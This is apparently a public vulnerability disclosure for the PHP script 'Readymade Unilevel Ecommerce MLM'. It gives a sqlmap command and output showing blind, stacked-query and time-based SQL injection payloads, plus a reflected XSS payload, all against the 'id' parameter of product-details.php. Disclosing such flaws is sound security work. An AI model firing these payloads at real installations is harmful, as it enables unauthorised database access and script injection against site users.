Headline
ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting
Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.
[x]========================================================================================================================================[x] | Title : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software : Readymade Unilevel Ecommerce | Last Update : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor : http://www.i-netsolution.com/ | Date : 01 Agustus 2024 | Author : OoN_Boy[x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price : $500 | Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.[x]========================================================================================================================================[x][O] Exploit http://localhost/eommlm/product-details.php?id=11[SQL] http://localhost/ecomlm/product-details.php?id=11[XSS] [O] Proof of concept sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string [SQL] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=11 AND 1189=1189 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=11;SELECT SLEEP(10)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL) [XSS] http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY> [x]========================================================================================================================================[x][O] GreetzBatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^[x]========================================================================================================================================[x]